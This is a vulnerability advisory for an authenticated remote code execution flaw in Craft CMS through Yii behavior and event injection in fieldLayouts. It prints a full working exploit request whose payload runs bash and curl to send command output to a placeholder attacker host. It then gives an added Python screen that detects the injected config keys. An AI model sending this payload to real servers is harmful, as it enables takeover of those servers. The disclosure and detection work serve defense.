CVE-2026-44011: Craft CMS has Potential Authenticated Remote Code Execution via Malicious Attached Behavior
We identified a vulnerability in the latest version of Craft CMS: an input-handling flaw in a Yii object-creation path that lets any authenticated user inject malicious configuration and execute arbitrary commands on the server. Yii's dynamic object configuration, as implemented in Craft CMS, is a feature that lets the application build parts of itself from a settings list.
This is largely a continuation of https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5, but through a different path that was not mitigated in the original.
The request-controlled fieldLayouts data inside the condition object is converted into a live FieldLayout object without passing through the Component::cleanseConfig() boundary. Because Craft configures models before parent::__construct() runs, attacker-controlled special config keys (the "as ..." behavior and "on ..." event keys) take effect during object creation, and FieldLayout initialization then triggers an event within the same request.
This appears to be another variant of the recent object-config / behavior-injection bug family, but via the condition / field layout hydration path.
We were able to reproduce the attack by issuing a POST request to /admin/actions/element-search/search with the following JSON body from any authenticated user. Other routes can be exploited in the same way, including the rest of the element-indexes actions that pass through the same beforeAction() path. The payload causes the server to issue a curl request to the attacker-chosen host, with the output of the command "id" (run as the web-server user) appended to the URL path:
POST /admin/actions/element-search/search HTTP/2
Host: hostnamehere
Cookie: CraftSessionId=...; 1234123412341234_identity=...; CRAFT_CSRF_TOKEN=...;
Content-Length: …
User-Agent: Mozilla/5.0
X-Csrf-Token: ...
Accept: application/json
Content-Type: application/json

{
    "elementType": "craft\\elements\\Category",
    "siteId": 1,
    "search": "",
    "condition": {
        "class": "craft\\elements\\conditions\\ElementCondition",
        "elementType": "craft\\elements\\Category",
        "fieldLayouts": [
            {
                "as rce": {
                    "__class": "yii\\behaviors\\AttributeTypecastBehavior",
                    "__construct()": [
                        {
                            "attributeTypes": {
                                "typecastBeforeSave": [
                                    "Psy\\Readline\\Hoa\\ConsoleProcessus",
                                    "execute"
                                ]
                            },
                            "typecastBeforeSave": "/bin/bash -c \"curl https://yourcollaboratorservergoeshere/`id`\""
                        }
                    ]
                },
                "on *": "self::beforeSave"
            }
        ]
    }
}
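The defensive counterpart of the request above is a pre-dispatch screen that refuses any JSON body in which Yii's object-configuration keys ("__class", "__construct()", "as <name>", "on <event>") appear at any depth, which is the same class of keys Component::cleanseConfig() is meant to strip. The following Python is an added example written for this page, not code from Craft CMS or the Yii project; the request bodies it checks are constructed samples that mirror the shape of the request above with a placeholder value in place of the command, and the "as "/"on " prefix matching follows Yii's own convention for behavior and event keys (an assumption about scope: a bare "class" key is deliberately not flagged, because Craft's element-search endpoint legitimately accepts it inside "condition", as the request above shows).

```python
"""Screen JSON request bodies for Yii object-configuration keys.

Added example (not Craft/Yii code): a WAF-style or controller-level check that
walks a decoded JSON body and reports every key that Yii would interpret as an
instruction to pick a class, pass constructor arguments, attach a behavior or
bind an event handler. None of these should ever arrive from an HTTP client.
"""
from __future__ import annotations

import json
from typing import Any


def is_object_config_key(key: str) -> bool:
    """True for keys that Yii's object-creation path treats specially.

    Yii matches behavior/event keys by the literal prefixes 'as ' and 'on ';
    '__class' selects the class and '__construct()' supplies constructor args.
    A plain 'class' key is NOT flagged here: Craft's condition config uses it
    legitimately, so blocking it would break normal element-search requests.
    """
    return (
        key in ("__class", "__construct()")
        or key.startswith("as ")
        or key.startswith("on ")
    )


def find_object_config_keys(node: Any, path: str = "$") -> list[tuple[str, str]]:
    """Recursively collect (json_path, key) pairs for every special key found."""
    hits: list[tuple[str, str]] = []
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            if isinstance(key, str) and is_object_config_key(key):
                hits.append((child, key))
            hits.extend(find_object_config_keys(value, child))
    elif isinstance(node, list):
        for index, item in enumerate(node):
            hits.extend(find_object_config_keys(item, f"{path}[{index}]"))
    return hits


def screen_request_body(raw: bytes | str) -> dict[str, Any]:
    """Return a verdict for one JSON request body.

    'block'       -> at least one Yii object-configuration key was found
    'allow'       -> no such key at any depth
    'unparseable' -> body is not JSON; leave the decision to the application
    """
    try:
        body = json.loads(raw)
    except ValueError:
        return {"verdict": "unparseable", "hits": []}
    hits = find_object_config_keys(body)
    return {"verdict": "block" if hits else "allow", "hits": hits}


# Constructed sample: an ordinary element-search body, which must pass.
BENIGN_BODY = json.dumps({
    "elementType": "craft\\elements\\Category",
    "siteId": 1,
    "search": "news",
    "condition": {
        "class": "craft\\elements\\conditions\\ElementCondition",
        "elementType": "craft\\elements\\Category",
    },
})

# Constructed sample: same shape as the advisory's request, with the
# command replaced by a placeholder. The nesting inside fieldLayouts is
# exactly why a top-level-only check would miss it.
SUSPECT_BODY = json.dumps({
    "elementType": "craft\\elements\\Category",
    "siteId": 1,
    "search": "",
    "condition": {
        "class": "craft\\elements\\conditions\\ElementCondition",
        "elementType": "craft\\elements\\Category",
        "fieldLayouts": [{
            "as rce": {
                "__class": "yii\\behaviors\\AttributeTypecastBehavior",
                "__construct()": [{"attributeTypes": {}, "typecastBeforeSave": "PLACEHOLDER"}],
            },
            "on *": "self::beforeSave",
        }],
    },
})


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("suspect", SUSPECT_BODY)):
        result = screen_request_body(body)
        print(label, result["verdict"])
        for json_path, key in result["hits"]:
            print("  ", json_path, "->", repr(key))
```

Run as a script it prints "allow" for the benign body and "block" for the suspect one, listing the four offending keys with their JSON paths (the "as rce" behavior key, the "__class" and "__construct()" keys inside it, and the "on *" event key). In a deployment this check belongs in front of every element-indexes action that shares the vulnerable beforeAction() path, not only the search endpoint shown in the advisory, and a hit is worth logging with the authenticated user's identity since the precondition is a valid session.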